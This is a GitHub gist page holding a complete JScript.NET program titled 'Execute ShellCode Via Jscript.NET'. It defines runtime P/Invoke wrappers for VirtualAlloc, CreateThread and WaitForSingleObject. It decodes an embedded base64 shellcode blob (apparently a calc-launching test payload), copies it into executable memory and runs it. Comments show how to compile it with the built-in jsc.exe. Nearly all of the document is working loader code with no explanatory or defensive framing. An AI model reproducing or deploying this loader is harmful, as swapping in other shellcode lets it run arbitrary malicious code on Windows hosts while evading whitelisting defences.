-
-
Save npocmaka/1095cc73ec30baeb71f1b1cf3ce76e07 to your computer and use it in GitHub Desktop.
Execute ShellCode Via Jscript.NET
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import System; | |
import System.Runtime.InteropServices; | |
import System.Reflection; | |
import System.Reflection.Emit; | |
import System.Runtime; | |
import System.Text; | |
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
function InvokeWin32(dllName:String, returnType:Type, | |
methodName:String, parameterTypes:Type[], parameters:Object[]) | |
{ | |
// Begin to build the dynamic assembly | |
var domain = AppDomain.CurrentDomain; | |
var name = new System.Reflection.AssemblyName('PInvokeAssembly'); | |
var assembly = domain.DefineDynamicAssembly(name, AssemblyBuilderAccess.Run); | |
var module = assembly.DefineDynamicModule('PInvokeModule'); | |
var type = module.DefineType('PInvokeType',TypeAttributes.Public + TypeAttributes.BeforeFieldInit); | |
// Define the actual P/Invoke method | |
var method = type.DefineMethod(methodName, MethodAttributes.Public + MethodAttributes.HideBySig + MethodAttributes.Static + MethodAttributes.PinvokeImpl, returnType, parameterTypes); | |
// Apply the P/Invoke constructor | |
var ctor = System.Runtime.InteropServices.DllImportAttribute.GetConstructor([Type.GetType("System.String")]); | |
var attr = new System.Reflection.Emit.CustomAttributeBuilder(ctor, [dllName]); | |
method.SetCustomAttribute(attr); | |
// Create the temporary type, and invoke the method. | |
var realType = type.CreateType(); | |
return realType.InvokeMember(methodName, BindingFlags.Public + BindingFlags.Static + BindingFlags.InvokeMethod, null, null, parameters); | |
} | |
function VirtualAlloc( lpStartAddr:UInt32, size:UInt32, flAllocationType:UInt32, flProtect:UInt32) | |
{ | |
var parameterTypes:Type[] = [Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.UInt32")]; | |
var parameters:Object[] = [lpStartAddr, size, flAllocationType, flProtect]; | |
return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "VirtualAlloc", parameterTypes, parameters ); | |
} | |
function CreateThread( lpThreadAttributes:UInt32, dwStackSize:UInt32, lpStartAddress:IntPtr, param:IntPtr, dwCreationFlags:UInt32, lpThreadId:UInt32) | |
{ | |
var parameterTypes:Type[] = [Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.IntPtr"),Type.GetType("System.IntPtr"), Type.GetType("System.UInt32"), Type.GetType("System.UInt32") ]; | |
var parameters:Object[] = [lpThreadAttributes, dwStackSize, lpStartAddress, param, dwCreationFlags, lpThreadId ]; | |
return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "CreateThread", parameterTypes, parameters ); | |
} | |
function WaitForSingleObject( handle:IntPtr, dwMiliseconds:UInt32) | |
{ | |
var parameterTypes:Type[] = [Type.GetType("System.IntPtr"),Type.GetType("System.UInt32")]; | |
var parameters:Object[] = [handle, dwMiliseconds ]; | |
return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "WaitForSingleObject", parameterTypes, parameters ); | |
} | |
function ShellCodeExec() | |
{ | |
var MEM_COMMIT:uint = 0x1000; | |
var PAGE_EXECUTE_READWRITE:uint = 0x40; | |
var shellcodestr:String = '/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYwA='; | |
var shellcode:Byte[] = System.Convert.FromBase64String(shellcodestr); | |
var funcAddr:IntPtr = VirtualAlloc(0, UInt32(shellcode.Length),MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
Marshal.Copy(shellcode, 0, funcAddr, shellcode.Length); | |
var hThread:IntPtr = IntPtr.Zero; | |
var threadId:UInt32 = 0; | |
// prepare data | |
var pinfo:IntPtr = IntPtr.Zero; | |
// execute native code | |
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, threadId); | |
WaitForSingleObject(hThread, 0xFFFFFFFF); | |
} | |
ShellCodeExec(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment